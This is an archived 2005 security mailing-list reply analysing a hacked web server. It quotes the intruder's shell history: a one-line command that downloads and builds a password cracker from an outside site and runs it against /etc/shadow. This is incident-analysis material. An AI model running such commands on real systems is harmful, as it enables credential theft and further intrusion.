Re: SSH compiled with backdoor

From: Javier Fernandez-Sanguino (jfernandez_at_germinus.com)
Date: 08/30/05

  • Next message: Alfred Huger: "Call for new mailing lists @ SecurityFocus"
    Date: Tue, 30 Aug 2005 12:43:31 +0200
    To: steve@example.org
    
    

    steve@example.org wrote:

    > Hi!
    >
    > One of my web servers was hacked on July 17, 2005. bash_history
    > showed:
    >
    > w wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
    > john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make
    > linux-x86-any-elf;cd ../run;./john /etc/shadow

    (...)

    > According to john, a couple of users had weak passwords, but root
    > seemed well protected. From looking in all the bash_history, it
    > appears the hacker came in from the website account, and did an su
    > from there.

    He might have escalated privileges to root from the website account
    using a kernel root exploit. You did not mention whose bash_history
    you provided but from the above john run is evident that he is already
    running as root (as he is able to read /etc/shadow).

    I wonder why he cracked those passwords if he already had root access.
    Maybe he wanted to use them to propagate the attack to nearby systems
    or to feed the vulnerable passwords to his personal password file.

    BTW, 'securedro' seems to have been removed from Geocities, but not
    'cretu_2004' (where the john sources are). The john sources downloaded
    from there, though, seem to be the same as downloaded from Openwall. I
    expected them to have "improved" the run/password.lst and add common
    (for them) passwords there.

    Regards

    Javier


  • Next message: Alfred Huger: "Call for new mailing lists @ SecurityFocus"

    Relevant Pages

    • Re: Attempt to breakin
      ... > a really dumb brute-force attack. ... a year or two old has a couple of very easy to remotely "get root" exploits. ... people that belong to the 'wheel' group can 'su' to root; ... Nobody can guess passwords if sshd won't accept passwords ...
      (comp.os.linux.networking)
    • Re: three questions
      ... (root by default) ... The Security check is a separate "letter" to you. ... the login failures sectoin means that you ... mistyped passwords or in some other way attempted to login improperly. ...
      (freebsd-questions)
    • Python script for MySQL Passwords Unreliable on first boot (rc.local)
      ... The script below works great when logged in as root and run from the ... # Udates system & MySQL root passwords on first boot ... for user, placeholder in userpasswords.iteritems: ...
      (comp.lang.python)
    • RE: should i bother??
      ... > (network address translation from a public IP to a private network is always advised here) ... certain outgoing ports on the firewall at work. ... I run root kit hunter as a daily cron job. ... > Strong passwords of random letters, with at least two numbers and two special characters for all accounts, definately root. ...
      (Fedora)
    • Re: The Leap to Linux
      ... > they are just not secure. ... samba - encrypted passwords = Easier for cracker to gain root access. ... displayed ROOT vulnrabilities. ...
      (alt.os.linux)